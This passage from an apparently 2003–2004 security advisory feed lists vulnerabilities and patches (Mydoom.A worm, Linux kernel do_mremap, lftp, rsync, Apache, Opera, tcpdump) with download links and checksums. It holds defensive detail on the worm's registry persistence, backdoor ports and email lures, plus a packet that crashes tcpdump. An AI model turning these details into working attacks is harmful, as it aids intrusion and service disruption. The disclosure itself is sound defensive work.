 99e8f3cb2c6cc748ca8c8d24ab555029  ppc/9.1/SRPMS/tcpdump-3.7.2-2.1.91mdk.src.rpm

 Mandrake Linux 9.2:
 595518640b2291ce10e26b943debf84b  9.2/RPMS/tcpdump-3.7.2-2.1.92mdk.i586.rpm
 8e3520db919980c762c7acce742f9831  9.2/SRPMS/tcpdump-3.7.2-2.1.92mdk.src.rpm

 Mandrake Linux 9.2/AMD64:
 efd0e0b8f9796b3ba98d3da63d5b38c2  amd64/9.2/RPMS/tcpdump-3.7.2-2.1.92mdk.amd64.rpm
 8e3520db919980c762c7acce742f9831  amd64/9.2/SRPMS/tcpdump-3.7.2-2.1.92mdk.src.rpm

 Multi Network Firewall 8.2:
 3eaac937cfc3d2390a2eda8dd431fc56  mnf8.2/RPMS/tcpdump-3.7.2-2.1.M82mdk.i586.rpm
 a33365b5a8d47668764615ec6713869f  mnf8.2/SRPMS/tcpdump-3.7.2-2.1.M82mdk.src.rpm
 __________________________

Internet Worm.Mydoom.A under attack

2004-01-27

Risk level: high

Type: Worm

Source of info: Symantec

Impact

Worm.Mydoom.A (W32.Novarg.A@mm) is a mass-mailing worm that arrives as an attachment with the file extension .bat, .cmd, .exe, .pif, .scr, or .zip. When a computer is infected, the worm will set up a backdoor into the system by opening TCP ports 3127 thru 3198. This can potentially allow an attacker to connect to the computer and use it as a proxy to gain access to its network resources. In addition, the backdoor has the ability to download and execute arbitrary files.

The worm will perform a DoS starting on February 1, 2004. It also has a trigger date to stop spreading on February 12, 2004.

Overview

1. Creates the following files:
          * %System%/shimgapi.dll
          * %temp%/Message (This file is full of random letters and is displayed using Notepad.)
          * %System%/taskmon.exe (If a copy of taskmon.exe exists in the %System%, it is overwritten and replaced by this copy of the worm.)
Notes:
          * taskmon.exe is a legitimate file in Windows 95/98/Me operating systems, stored in the %Windir% folder. (by default, this is C:\Windows or C:\Winnt) Do not delete this file by mistake.
* %System% is a variable. The worm locates the System folder and copies itself to that location. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
         * %Temp% is a variable. The worm locates the temporary folder and copies itself to that location. By default, this is C:\Windows\TEMP (Windows 95/98/Me), or C:\WINNT\Temp (Windows NT/2000), or C:\Document and Settings\<UserName>\Local Settings\Temp (Windows XP).

2. Shimgapi.dll acts as a proxy server, opening TCP listening ports in the range of 3127 to 3198. The backdoor also has the ability to download and execute arbitrary files.

3. Adds the value:

      "(Default)" = "%System%\shimgapi.dll"

      to the registry key:

      HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32

      so that shimgapi.dll is loaded by EXPLORER.EXE.

4. Adds the value:

      "TaskMon" = "%System%\taskmon.exe"

      to the registry keys:
          * HKEY_CURRENT_USER\Software\Microsft\Windows\CurrentVersion\Run
          * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

5. Attempts to perform a Denial of Service attack against www.sco.com by creating 64 threads that send GET requests and use a direct connection to port 80.

      Note: The DoS is active between February 1, 2004 and February 12, 2004.

6. Creates the following registry keys:
          * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
            Explorer\ComDlg32\Version
          * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
            Explorer\ComDlg32\Version

7. Searches for email addresses in files with the following extensions.
          * .htm
          * .sht
          * .php
          * .asp
          * .dbx
          * .tbb
          * .adb
          * .pl
          * .wab
          * .txt
            Note: It ignores addresses which end in .edu.
8. Attempts to send emails using its own SMTP engine. The worm performs a lookup of the mail server used by the recipient before sending the email. If it is unsuccessful, it will use the local mail server instead.

9. The email will have the following characteristics:

      From: may be a spoofed from address

      Subject:
      (one of the following)
          * test
          * hi
          * hello
          * Mail Delivery System
          * Mail Transaction Failed
          * Server Report
          * Status
          * Error

            Message:
            (one of the following)
          * Mail transaction failed. Partial message is available.
          * The message contains Unicode characters and has been sent as a binary attachment.
          * The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment.

            Attachment:
            (one of the following)
          * document
          * readme
          * doc
          * text
          * file
          * data
          * test
          * message
          * body

            Notes:
          * The attachment may have two suffixes. If so, the first suffix will be one of the following:
                o .htm
                o .txt
                o .doc
          * The worm will always end with one of the following suffixes:
                o .pif
                o .scr
                o .exe
                o .cmd
                o .bat
                o .zip
          * The icon displayed will look like the following:



            unless the worm has .exe or .scr for an extension, in which case the file will use the following icon:


10. Copies itself to Kazaa download folder as one of the following files:
          * winamp5
          * icq2004-final
          * activation_crack
          * strip-girl-2.0bdcom_patches
          * rootkitXP
          * office_crack
          * nuke2004

            with a file extension of:
          * .pif
          * .scr
          * .bat
          * .exe

An update for a newly discovered vulnerability in Microsoft Internet Security and Acceleration Server 2000

2004-01-14

Risk level: critical

Type: Remote code execution

Source of info: Microsoft Security Team

Impact

An update for a newly discovered vulnerability in Microsoft Internet Security and Acceleration Server 2000. This vulnerability is rated Critical.

Overview

n update is available to fix this vulnerability.
For additional information, including Technical Details, Workarounds, answers to Frequently Asked Questions, and Update Deployment Information please read the Microsoft ISA Server Security Bulletin Summary for January at:
http://www.microsoft.com/technet/security/bulletin/isajan04.asp

Patches

See:
http://www.microsoft.com/technet/security/bulletin/isajan04.asp

An update for a newly discovered vulnerability in Microsoft Exchange Server 2003.

2004-01-14

Risk level: moderate

Type: Elevation of privilege

Source of info: Microsoft Security Team

Impact

Vulnerability in Exchange Server 2003 Could Lead to
Privilege Escalation.

Overview

An update is available to fix this vulnerability.
For additional information, including Technical Details, 
Workarounds, answers to Frequently Asked Questions, and Update 
Deployment Information please read the Microsoft Exchange Server 
2003 Security Bulletin Summary for January at:
http://www.microsoft.com/technet/security/bulletin/excjan04.asp

Patches

See:
http://www.microsoft.com/technet/security/bulletin/excjan04.asp

an update for a newly discovered vulnerability in Microsoft Data Access Components (MDAC)

2004-01-14

Risk level: Important

Type: Remote code execution

Source of info: CERT

Impact

Buffer Overrun in MDAC Function Could Allow Code       Execution

Overview

An update is available to fix this vulnerability.
For additional information, including Technical Details, 
Workarounds, answers to Frequently Asked Questions, and Update 
Deployment Information please read the Microsoft Windows Security 
Bulletin Summary for January at:
http://www.microsoft.com/technet/security/bulletin/winjan04.asp

Patches

See:
http://www.microsoft.com/technet/security/bulletin/winjan04.asp

SGI Advanced Linux Environment security update #8

2004-01-07

Risk level: high

Type: Buffer overflow

Source of info: SGI Security Team

Impact

SGI has released Patch 10040: SGI Advanced Linux Environment security update #8, which includes updated RPMs for SGI ProPack v2.3 for the Altix
family of systems.

Overview

The patch has been created in response to the following erratas released by Red Hat :
 Updated lftp packages fix security vulnerability
 http://rhn.redhat.com/errata/RHSA-2003-404.html

Patches

Patch 10040 is available from http://support.sgi.com/ and
ftp://patches.sgi.com/support/free/security/patches/ProPack/2.3/

The individual RPMs from Patch 10040 are available from:
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/SRPMS

Bugs in linux kernel (in do_mremap function)

2004-01-05

Risk level: high

Type: local system compromise

Source of info: SuSE Security Team

Impact

Incorrect bounds checking in one of the kernel functions can lead to local system compromise.

Overview

The do_mremap() function of the Linux Kernel is used to manage
    (move, resize) Virtual Memory Areas (VMAs). By exploiting an incorrect
    bounds check in do_mremap() during the remapping of memory it is
    possible to create a VMA with the size of 0.
    In normal operation do_mremap() leaves a memory hole of one page and
    creates an additional VMA of two pages. In case of exploitation no
    hole is created but the new VMA has a 0 bytes length.
    The Linux Kernel's memory management is corrupted from this point
    and can be abused by local users to gain root privileges.

    There is no temporary workaround for this bug.

Patches

 Intel i386 Platform:

    SuSE-9.0:
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-166.i586.rpm
      0bbda4a9166edcdd4444fa43a5b37f10
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-166.src.rpm
      3cce21862c2d54a82742c74557dcc7fa
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-166.i586.rpm
      6df247b9f114e8636de2c673747ef6ea
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-166.src.rpm
      c06a81d1e7912db429df25e8e8d754b7
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-166.i586.rpm
      0da9470eb573ecb5c801bedbd5dbf666
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-166.src.rpm
      34393ea6b46a8b8859d51020e1dc275e
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-166.i586.rpm
      0b0d23a4a6918e57a1e7c45504a50df7
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-166.src.rpm
      26cadc4c9d77dc6e433bedc458166236
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-166.i586.rpm
      7e18d9b0b89ef72bee40bbf150dd0470
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-166.src.rpm
      ad8c357792c0d34570c9ba54a579d867
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-166.i586.rpm
      48b46c943cc15aacfba0ec68090de1f6
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-166.src.rpm
      ef71c55f61b595edc24be7c318237432

    SuSE-8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-102.i586.rpm
      61de636fab3149ee5d45d16dccf8d0e8
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-102.src.rpm
      80b8f44b6f8f4d039b8954c709b457b0
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-102.i586.rpm
      c25b57bc5d67d87177abf7953f022331
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-102.src.rpm
      29d014e79a3ee0b14a23cb0e4bdd0f0e
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-102.i586.rpm
      d42041b08cdee2d9959a4a6dad8b6e9d
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-102.src.rpm
      22e598ebf546cd9378c852042b602f2f
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-102.i586.rpm
      c2e0455b45eac55c97e13322ab40e4bc
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-102.src.rpm
      68b2d35ae0de009ac3fbc6ee9a0bb3fd
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-102.i586.rpm
      0f539af39523fd27232289014db36202
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-102.src.rpm
      14c238bbbd7758abc2b4113a7297f2b5

    SuSE-8.1:
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-168.i586.rpm
      8299b1153d3d9d81236e4e77f3ae66e2
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-168.src.rpm
      0705e6bb739aaec77bc9801760e60051
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-168.i586.rpm
      fea1ffe95acdbc5c00d3272b3867bd39
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-168.src.rpm
      aeff9339c71c275fd3c7e9ebcf49cc4f
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-168.i586.rpm
      f4e41bdd0806673d82dc0971e36da0e1
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-168.src.rpm
      f352afbf4c6d679fd4bf40347bd7989c
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_debug-2.4.21-168.i586.rpm
      81e9a2516e7b9a8d0234f2d6ee9e4444
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_debug-2.4.21-168.src.rpm
      8b6c8e51c93c9dcbf5d34587de722a4a
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-168.i586.rpm
      9961f14d44c40a83be800ad463e17e51
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-168.src.rpm
      f3caa2e715d24a2987408e29e0623737

    SuSE-8.0:
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-282.i386.rpm
      62ae55de1c6abbe821b99165cbccdce7
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-282.src.rpm
      c65eadb1dd7225463f7a29979ab43dd8
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-282.i386.rpm
      7fdec3995171a6d88f293c10c41e6991
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-282.src.rpm
      08a2cba4382f4bb8adfc5cb8f80677d1
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-282.i386.rpm
      955386318df968aac6c66b6071eb466a
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-282.src.rpm
      fe87f59c3e818fbb9eedcb211f9d0bf4
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-282.i386.rpm
      249a3cd1dcc1edaabf00d72874ba4aa2
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-282.nosrc.rpm
      7e5cbc3af87fdedbd8b6dc829e038d63
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-282.i386.rpm
      bd80346beef2e459009584065fccc7eb
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-282.src.rpm
      ce704a3481d8b84f9fdd0b83784e74a6


    Opteron x86_64 Platform:

    SuSE-9.0:
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-171.x86_64.rpm
      3dd54a4105bad6c4f3084e70aaa45410
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-171.src.rpm
      d88ca0142409a98a7e4e9f4f7b2e9bf8
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-171.x86_64.rpm
      b97e9d91ef710b0b801536294d99ba1a
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-171.src.rpm
      6221b0f5893499f5926c9dd529fceb5c
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-171.x86_64.rpm
      1a27668dff4ae3c405f18399432a326e
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-171.src.rpm
      301e1d8ac232d3a000f373a928deee5f

New lftp packages fix arbitrary code execution

2004-01-04

Risk level: high

Type: Buffer overflow

Source of info: Debian Security Team

Impact

Remotly exploitable bug in lftp can lead to the execution of arbitrary code.

Overview

Ulf Harnhammar discovered a buffer overflow in lftp, a set of
sophisticated command-line FTP/HTTP client programs.  An attacker
could create a carefully crafted directory on a website so that the
execution of an 'ls' or 'rels' command would lead to the execution of
arbitrary code on the client machine.

Patches

Links for updated Debian's packages:

Debian GNU/Linux 3.0 alias woody
- --------------------------------
  Source archives:
http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2.dsc
      Size/MD5 checksum:      604 f5daa8b9ca0b4a3dd775ece1d5d90dbc
    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2.diff.gz
      Size/MD5 checksum:    23483 9f2005abc309b9e44c09e4518063f811
    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9.orig.tar.gz
      Size/MD5 checksum:  1479880 53ce980339e1adb0c4ec7135950d2055

  Alpha architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_alpha.deb
      Size/MD5 checksum:   506612 8c0580626371c756c0a0c62eeb5128f0

  ARM architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_arm.deb
      Size/MD5 checksum:   443624 8b2393f949aeca43699e27527d4e3179

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_i386.deb
      Size/MD5 checksum:   441070 96b40a457747a309b72e240bf88f1dcd

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_ia64.deb
      Size/MD5 checksum:   602626 bbc526e8b9212b5b1e80558958677299

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_hppa.deb
      Size/MD5 checksum:   499616 8ad2c1349fe16284b8f904d88177e9ee

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_m68k.deb
      Size/MD5 checksum:   423600 652c35b149e1ce3bb6602ed17430e1a2

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_mips.deb
      Size/MD5 checksum:   472524 7545ec21b6a423373538ecd941848e5a

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_mipsel.deb
      Size/MD5 checksum:   470934 3153069a5cd81582d270bb0341b30c08

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_powerpc.deb
      Size/MD5 checksum:   457702 4d58d1f70d75f8a8f173f5d966ced97a

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_s390.deb
      Size/MD5 checksum:   452260 149e1fbbc06fdad45b0cf64cb3d43350

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/l/lftp/lftp_2.4.9-1woody2_sparc.deb
      Size/MD5 checksum:   445716 07b1e6b07e9a4a7f47bddebf82c5f372


  These files will probably be moved into the stable distribution on
  its next revision.

Hijacking Apache https by mod_php

2003-12-26

Risk level: medium

Type: Buffer overflow

Source of info: Steve Grub

Impact

Mod_php under apache 2.0.x leaks a critical file descriptor that can be used to takeover (hijack) the https service.

Overview

hen using mod_php, many file descriptors are leaked to the php script process. If the script page calls external programs by passthru(), exec(), or system(), the descriptors are leaked to that program as well.

One of these descriptors is the listening descriptor to port 443, also known as https. Port 443 is a privileged port and can only be bound to by a root process. It is not normal for that descriptor to be leaked to any or all programs. As a side note, this descriptor seems to be opened by apache regardless of whether or not you use https.

The bug is caused by not making a call to fcntl with the CLOEXEC flag to prevent the leak of a privileged file descriptor. ( It really is a 1 line fix ! )

The listening descriptor is used by all sites on the same machine. If a person can ftp in an executable and has access to php, they may be able to hijack the https service for all sites on the machine. Sandboxing and jailing may not help since the descriptor itself is leaked to the child.

"Safe_mode = on" does not offer any protection for this 
problem if safe_mode_exec_dir points to a directory hat 
can be ftp'd to.

Arbitrary File Delete Vulnerability in Opera 7

2003-12-22

Risk level: Critical

Type: remote file deletion

Source of info: Operash

Impact

Displaying a Download Dialog, Opera creates a temporary file.
  But this file name is not sanitized enough, so that an existing
  file can be deleted.

Overview

Exploiting this vulnerability,  an attacker can delete
  an arbitrary existing file on a local disk from remote.

  With this vulnerability, there could be following risks;

  * Destruction of the system.
  * Destruction of application data.

SYSTEMS AFFECTED
=====================

  7.22 build 3221 (JP:build 3222)
  7.21 build 3218 (JP:build 3219)
  7.20 build 3144 (JP:build 3145)
  7.1x
  7.0x


SYSTEMS NOT AFFECTED
=========================

  7.23 build 3227 (JP:build 3226)


EXAMINES
=============

  Opera for Windows:
    Opera 7.23 build 3227 (JP:build 3226)
    Opera 7.22 build 3221 (JP:build 3222)
    Opera 7.21 build 3218 (JP:build 3219)
    Opera 7.20 build 3144 (JP:build 3145)
    Opera 7.11 build 2887
    Opera 7.11 build 2880
    Opera 7.10 build 2840
    Opera 7.03 build 2670
    Opera 7.02 build 2668
    Opera 7.01 build 2651

  Platform:
    Windows 98SE Japanese
    Windows 2000 Professional SP4 Japanese
    Windows XP Professional SP1 Japanese


SOLUTION
========

  Upgrade to version 7.23 or later version.

Patches

http://www.opera.com/

Repetable tcpdump remote crash

2003-12-20

Risk level: Critical

Type: Buffer overflow

Source of info: Przemyslaw Frasunek

Impact

Sending a packet containg 0xff,0x02 bytes to port 1701/udp causes a L2TP protocol parser in tcpdump to enter an infinite loop, eating all available memory and then segfaulting.

	

Overview

This bug also affects tcpdump in -CURRENT.
Fix: Unknown, recent versions of tcpdump are immune to this problem.

Search for more information and patches at:
http://www.openbsd.org/query-pr.html
using PR number: 3610

Patches

Search for more information and patches at:
http://www.openbsd.org/query-pr.html
using PR number: 3610

Updated httpd packages fix Apache security vulnerabilities

2003-12-18

Risk level: high

Type: many types

Source of info: Red Hat Security Team

Impact

Updated httpd packages that fix two minor security issues in the Apache Web
server are now available for Red Hat Linux 8.0, 9 (CAN-2003-0542, CAN-2003-0789),and  for 7.1, 7.2, and 7.3 as well (CAN-2003-0542).

Overview

The Apache HTTP Server is a powerful, full-featured, efficient, and
freely-available Web server.

An issue in the handling of regular expressions from configuration files
was discovered in releases of the Apache HTTP Server version 2.0 prior to
2.0.48.  To exploit this issue an attacker would need to have the ability
to write to Apache configuration files such as .htaccess or httpd.conf.  A
carefully-crafted configuration file can cause an exploitable buffer
overflow and would allow the attacker to execute arbitrary code in the
context of the server (in default configurations as the 'apache' user).
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0542 to this issue.

A bug in the CGI daemon-based "mod_cgid" module was discovered that can
result in CGI script output being sent to the wrong client. This issue only
affects Red Hat Linux 9, and only when the server is configured to use the
"worker" MPM. The default configuration uses the "mod_cgi" module for CGI
and is not affected by this issue. The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2003-0789 to this issue.

Users of the Apache HTTP Server should upgrade to these erratum packages,
which contain backported patches correcting these issues, and are applied
to Apache version 2.0.40.

Patches

Red Hat Linux 8.0:

SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/httpd-2.0.40-11.9.src.rpm

i386:
ftp://updates.redhat.com/8.0/en/os/i386/httpd-2.0.40-11.9.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/httpd-devel-2.0.40-11.9.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/httpd-manual-2.0.40-11.9.i386.rpm
ftp://updates.redhat.com/8.0/en/os/i386/mod_ssl-2.0.40-11.9.i386.rpm

Red Hat Linux 9:

SRPMS:
ftp://updates.redhat.com/9/en/os/SRPMS/httpd-2.0.40-21.9.src.rpm

i386:
ftp://updates.redhat.com/9/en/os/i386/httpd-2.0.40-21.9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/httpd-devel-2.0.40-21.9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/httpd-manual-2.0.40-21.9.i386.rpm
ftp://updates.redhat.com/9/en/os/i386/mod_ssl-2.0.40-21.9.i386.rpm

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/apache-1.3.27-3.7.1.src.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/apache-1.3.27-3.7.1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/apache-devel-1.3.27-3.7.1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/apache-manual-1.3.27-3.7.1.i386.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/apache-1.3.27-3.7.2.src.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/apache-1.3.27-3.7.2.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/apache-devel-1.3.27-3.7.2.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/apache-manual-1.3.27-3.7.2.i386.rpm

ia64:
ftp://updates.redhat.com/7.2/en/os/ia64/apache-1.3.27-3.7.2.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/apache-devel-1.3.27-3.7.2.ia64.rpm
ftp://updates.redhat.com/7.2/en/os/ia64/apache-manual-1.3.27-3.7.2.ia64.rpm

Red Hat Linux 7.3:

SRPMS:
ftp://updates.redhat.com/7.3/en/os/SRPMS/apache-1.3.27-4.src.rpm

i386:
ftp://updates.redhat.com/7.3/en/os/i386/apache-1.3.27-4.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/apache-devel-1.3.27-4.i386.rpm
ftp://updates.redhat.com/7.3/en/os/i386/apache-manual-1.3.27-4.i386.rpm

Buffer overflows in lftp

2003-12-15

Risk level: medium

Type: remote system compromise

Source of info: SuSE Security Team

Impact

The flexible and powerful FTP command-line client  lftp is vulnerable to two remote buffer overflows.
When using lftp via HTTP or HTTPS to execute commands like 'ls' or 'rels' specially prepared directories on the server can trigger a buffer overflow in the HTTP handling functions of lftp to possibly execute arbitrary code on the client-side. Please note, to exploit these bugs an attacker has to control the server-side of the context and the attacker will only gain access to the account of the user that is executing lftp.

Overview

Ulf Hu00e4rnhammar, who posted this issue to bug-traq, stated that technically, the problem lies in the file src/HttpDir.cc and the functions try_netscape_proxy() and try_squid_eplf(), which both have sscanf() calls that take data of an arbitrary length and store it in a char array with 32 elements. (Back in version 2.3.0,
the problematic code was located in some other function, but the problem existed back then too.)
Depending on the HTML document in the specially prepared directory, buffers will be overflown in either one function or the other.

Patches

Src (vendor page):
http://lftp.yar.ru/

SuSE updates: 
Intel i386 Platform:
 SuSE-9.0 :
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/lftp-2.6.6-71.i586.rpm
      2e5aee46868b5b19c26a8559927e8663
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/lftp-2.6.6-71.i586.patch.rpm
      0468cf8f2b2b4c18a854f51ef63470b7
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/lftp-2.6.6-71.src.rpm
      a32eee3ff4eeb322d44f04b9f8ff4c9c

    SuSE-8.2:
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/lftp-2.6.4-44.i586.rpm
      df0d7c059cd3bb4fe47c927849fd9a5e
    patch rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/lftp-2.6.4-44.i586.patch.rpm
      eb9d6aedc25d3e2d25b63999526ee1bd
    source rpm(s):
    ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/lftp-2.6.4-44.src.rpm
      63695b02bf520b02f93ec73078d6e4d8

Bugs in cvs

2003-12-11

Risk level: minimal

Type: many types

Source of info: GENTOO LINUX SECURITY TEAM

Impact

Stable CVS 1.11.10 has been released. Stable releases contain only bug fixes from previous versions of CVS. This release fixes a security issue with no known exploits that could cause previous versions of CVS to attempt to create files and directories in the filesystem root. This release also fixes several issues relevant to    case insensitive filesystems and some other bugs. We recommend this upgrade for all CVS clients and servers.

Overview

More info could be found here:
<http://ccvs.cvshome.org/servlets/NewsItemView?newsID=84>

Patches

http://ccvs.cvshome.org/

SGI Advanced Linux Environment security update #6

2003-12-10

Risk level: medium

Type: many types

Source of info: SGI Security Team

Impact

SGI has released Patch 10037: SGI Advanced Linux Environment security update #6, which includes updated RPMs for SGI ProPack v2.3 for the Altix
family of systems.
 

Overview

Update has been released in response to the following erratas released by Red Hat:
New rsync packages fix remote security vulnerability
 http://rhn.redhat.com/errata/RHSA-2003-399.html

Patches

Patch 10037 is available from http://support.sgi.com/ and
ftp://patches.sgi.com/support/free/security/patches/ProPack/2.3/

The individual RPMs from Patch 10037 are available from:
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/RPMS
ftp://oss.sgi.com/projects/sgi_propack/download/2.3/updates/SRPMS

Remotely exploitable heap overflow in rsync

2003-12-05

Risk level: high

Type: heap overflow

Source of info: rsync team

Impact

The rsync team has received evidence that a vulnerability in rsync was recently used in combination with a Linux kernel vulnerability to
compromise the security of a public rsync server.

Overview

conclusions are that:
 - rsync version 2.5.6 contains a heap overflow vulnerability that can be used to remotely run arbitrary code.
- While this heap overflow vulnerability could not be used by itself to obtain root access on a rsync server, it could be used in combination with the recently announced brk vulnerability in the Linux kernel to produce a full remote compromise.
- The server that was compromised was using a non-default rsyncd.conf option "use chroot = no". The use of this option made the attack on the compromised server considerably easier. A successful attack is almost certainly still possible without this option, but it would be much more difficult.

Please note that this vulnerability only affects the use of rsync as a "rsync server". To see if you are running a rsync server you should use the netstat command to see if you are listening on TCP port 873. If you are not listening on TCP port 873 then you are not running a rsync server.

Patches

The patches and full source for rsync version 2.5.7 are available from http://rsync.samba.org/ and mirror sites.

Multiple OpenSSH/OpenSSL Vulnerabilities Update on Irix

2003-12-03
